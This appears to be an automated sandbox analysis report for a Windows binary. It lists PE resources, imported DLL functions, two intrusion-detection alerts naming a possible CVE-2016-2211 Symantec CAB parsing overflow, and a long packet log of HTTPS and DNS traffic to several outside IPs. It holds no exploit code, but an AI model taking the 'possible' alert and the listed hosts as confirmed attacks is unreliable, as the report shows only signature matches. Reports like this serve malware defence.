RT_STRING | 0x7d31c | 0x164 | data | | | 0.5056179775280899
RT_STRING | 0x7d480 | 0x110 | data | | | 0.5772058823529411
RT_STRING | 0x7d590 | 0x158 | data | | | 0.4563953488372093
RT_STRING | 0x7d6e8 | 0xe8 | data | | | 0.5948275862068966
RT_STRING | 0x7d7d0 | 0x1c6 | data | | | 0.5242290748898678
RT_STRING | 0x7d998 | 0x268 | data | | | 0.4837662337662338
RT_GROUP_ICON | 0x7dc00 | 0x68 | data | | | 0.7019230769230769
RT_MANIFEST | 0x7dc68 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.3957333333333333
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-30T00:56:50.218743+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49730 | 20.12.23.50 | 192.168.2.6
2024-07-30T00:57:27.842535+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49753 | 20.12.23.50 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Jul 30, 2024 00:56:36.593683004 CEST49719443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:36.628010988 CEST49719443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:36.628026962 CEST4434971940.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:36.628335953 CEST4434971940.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:36.679516077 CEST49719443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:36.758900881 CEST49719443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:36.759052992 CEST49719443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:36.759067059 CEST4434971940.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:36.759354115 CEST49719443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:36.804507017 CEST4434971940.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:36.957379103 CEST4434971940.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:36.957583904 CEST4434971940.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:36.957715988 CEST49719443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:36.962513924 CEST49719443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:36.962532997 CEST4434971940.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:36.962598085 CEST49719443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:37.382491112 CEST49673443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:37.382580996 CEST49674443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:37.702573061 CEST49672443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:39.399722099 CEST44349705173.222.162.64192.168.2.6
                                                                            Jul 30, 2024 00:56:39.399842978 CEST49705443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:44.016822100 CEST49720443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:44.016864061 CEST4434972040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:44.016963959 CEST49720443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:44.017560959 CEST49720443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:44.017577887 CEST4434972040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:44.865710974 CEST4434972040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:44.865854979 CEST49720443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:44.868757963 CEST49720443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:44.868772984 CEST4434972040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:44.869028091 CEST4434972040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:44.870874882 CEST49720443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:44.870934010 CEST49720443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:44.870940924 CEST4434972040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:44.871073008 CEST49720443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:44.916500092 CEST4434972040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:45.056077003 CEST4434972040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:45.056282043 CEST4434972040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:45.056410074 CEST49720443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:45.056526899 CEST49720443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:45.056545019 CEST4434972040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:48.468806982 CEST49721443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:48.468853951 CEST44349721104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:48.468943119 CEST49721443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:48.565579891 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:48.565627098 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:48.565691948 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:48.672595024 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:48.672622919 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:48.675889015 CEST49721443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:48.675900936 CEST44349721104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.063507080 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:49.063555002 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:49.063677073 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:49.065767050 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:49.065779924 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:49.158268929 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.158653021 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.158680916 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.160262108 CEST44349721104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.160303116 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.160365105 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.160449028 CEST49721443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.160454988 CEST44349721104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.161465883 CEST44349721104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.161516905 CEST49721443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.162347078 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.162461042 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.162983894 CEST49721443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.163049936 CEST44349721104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.163436890 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.163446903 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.206513882 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.206513882 CEST49721443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.206525087 CEST44349721104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.254252911 CEST49721443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.635289907 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.635325909 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.635353088 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.635405064 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.635425091 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.635499954 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.635507107 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.636673927 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.636775970 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.636782885 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.636796951 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.636847973 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.669837952 CEST49722443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:56:49.669857025 CEST44349722104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:56:49.696535110 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:49.696611881 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:49.726114988 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:49.726140022 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:49.726213932 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:49.726407051 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:49.726421118 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:49.732652903 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:49.732682943 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:49.733036995 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:49.749429941 CEST49733443192.168.2.688.212.201.204
                                                                            Jul 30, 2024 00:56:49.749466896 CEST4434973388.212.201.204192.168.2.6
                                                                            Jul 30, 2024 00:56:49.749540091 CEST49733443192.168.2.688.212.201.204
                                                                            Jul 30, 2024 00:56:49.749877930 CEST49733443192.168.2.688.212.201.204
                                                                            Jul 30, 2024 00:56:49.749891996 CEST4434973388.212.201.204192.168.2.6
                                                                            Jul 30, 2024 00:56:49.776523113 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:50.011502981 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:50.052509069 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.100539923 CEST49705443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:50.100828886 CEST49705443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:50.101648092 CEST49738443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:50.101696014 CEST44349738173.222.162.64192.168.2.6
                                                                            Jul 30, 2024 00:56:50.101876020 CEST49738443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:50.103559971 CEST49738443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:50.103575945 CEST44349738173.222.162.64192.168.2.6
                                                                            Jul 30, 2024 00:56:50.117347956 CEST44349705173.222.162.64192.168.2.6
                                                                            Jul 30, 2024 00:56:50.117790937 CEST44349705173.222.162.64192.168.2.6
                                                                            Jul 30, 2024 00:56:50.210753918 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.211029053 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.211042881 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.212104082 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.212182999 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.213346958 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.213421106 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.213586092 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.216331959 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.216356039 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.216363907 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.216384888 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.216464996 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:50.216464996 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:50.216490984 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.216497898 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.216537952 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:50.218543053 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.218614101 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:50.218621016 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.218631983 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.218683004 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:50.256505013 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.258892059 CEST49730443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:56:50.258932114 CEST4434973020.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:56:50.268529892 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.268544912 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.315501928 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.362931967 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.363010883 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.363037109 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.363061905 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.363070965 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.363080978 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.363112926 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.363221884 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.363257885 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.363265991 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.364509106 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.364564896 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.364573002 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.365966082 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.366009951 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.366017103 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.368669033 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.368707895 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.368851900 CEST44349732172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:50.368902922 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.368921995 CEST49732443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:50.388577938 CEST49739443192.168.2.635.190.80.1
                                                                            Jul 30, 2024 00:56:50.388600111 CEST4434973935.190.80.1192.168.2.6
                                                                            Jul 30, 2024 00:56:50.388694048 CEST49739443192.168.2.635.190.80.1
                                                                            Jul 30, 2024 00:56:50.388889074 CEST49739443192.168.2.635.190.80.1
                                                                            Jul 30, 2024 00:56:50.388899088 CEST4434973935.190.80.1192.168.2.6
                                                                            Jul 30, 2024 00:56:50.721860886 CEST4434973388.212.201.204192.168.2.6
                                                                            Jul 30, 2024 00:56:50.722141027 CEST49733443192.168.2.688.212.201.204
                                                                            Jul 30, 2024 00:56:50.722157001 CEST4434973388.212.201.204192.168.2.6
                                                                            Jul 30, 2024 00:56:50.723431110 CEST4434973388.212.201.204192.168.2.6
                                                                            Jul 30, 2024 00:56:50.723520994 CEST49733443192.168.2.688.212.201.204
                                                                            Jul 30, 2024 00:56:50.727186918 CEST49733443192.168.2.688.212.201.204
                                                                            Jul 30, 2024 00:56:50.727272987 CEST4434973388.212.201.204192.168.2.6
                                                                            Jul 30, 2024 00:56:50.727814913 CEST49733443192.168.2.688.212.201.204
                                                                            Jul 30, 2024 00:56:50.727823019 CEST4434973388.212.201.204192.168.2.6
                                                                            Jul 30, 2024 00:56:50.735444069 CEST44349738173.222.162.64192.168.2.6
                                                                            Jul 30, 2024 00:56:50.735526085 CEST49738443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:50.773693085 CEST49733443192.168.2.688.212.201.204
                                                                            Jul 30, 2024 00:56:50.880680084 CEST4434973935.190.80.1192.168.2.6
                                                                            Jul 30, 2024 00:56:50.883083105 CEST49739443192.168.2.635.190.80.1
                                                                            Jul 30, 2024 00:56:50.883095980 CEST4434973935.190.80.1192.168.2.6
                                                                            Jul 30, 2024 00:56:50.884207010 CEST4434973935.190.80.1192.168.2.6
                                                                            Jul 30, 2024 00:56:50.884274960 CEST49739443192.168.2.635.190.80.1
                                                                            Jul 30, 2024 00:56:50.888339043 CEST49739443192.168.2.635.190.80.1
                                                                            Jul 30, 2024 00:56:50.888417006 CEST4434973935.190.80.1192.168.2.6
                                                                            Jul 30, 2024 00:56:50.888552904 CEST49739443192.168.2.635.190.80.1
                                                                            Jul 30, 2024 00:56:50.932651043 CEST49739443192.168.2.635.190.80.1
                                                                            Jul 30, 2024 00:56:50.932661057 CEST4434973935.190.80.1192.168.2.6
                                                                            Jul 30, 2024 00:57:27.838582039 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.838649035 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.838684082 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.838712931 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.842300892 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.842345953 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.842396021 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.842406988 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.842420101 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.842420101 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.842673063 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.844537973 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.844567060 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.844597101 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.844602108 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:44.685390949 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:44.685431004 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:44.685514927 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:44.689668894 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:44.689682961 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.538291931 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.538465977 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.541152954 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.541160107 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.541405916 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.543879032 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.543951988 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.543960094 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.544146061 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.584496975 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.727072001 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.727410078 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.727564096 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.727880001 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.727900982 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:52.681859016 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:52.681915998 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:52.682152987 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:52.682431936 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:52.682442904 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:53.339844942 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:53.340281010 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:53.340306044 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:53.340651989 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:53.341042995 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:53.341110945 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:53.384718895 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:57.009581089 CEST5878653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:57:57.025928974 CEST53587861.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:57.026488066 CEST5878653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:57:57.026488066 CEST5878653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:57:57.042280912 CEST53587861.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:57.513586998 CEST53587861.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:57.514988899 CEST5878653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:57:57.539103985 CEST53587861.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:57.539159060 CEST5878653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:58:03.251549006 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:58:03.251616001 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:58:03.251777887 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:58:05.154359102 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:58:05.154386997 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:58:17.732601881 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:17.732647896 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:17.732717037 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:17.733367920 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:17.733386040 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.572107077 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.572216034 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.579072952 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.579097986 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.579298973 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.581891060 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.581995964 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.582007885 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.582351923 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.628498077 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.766479969 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.766566992 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.766618967 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.766850948 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.766875029 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.122247934 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.122313023 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.122581959 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.123147964 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.123168945 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.954035997 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.956083059 CEST58797443192.168.2.640.113.110.67
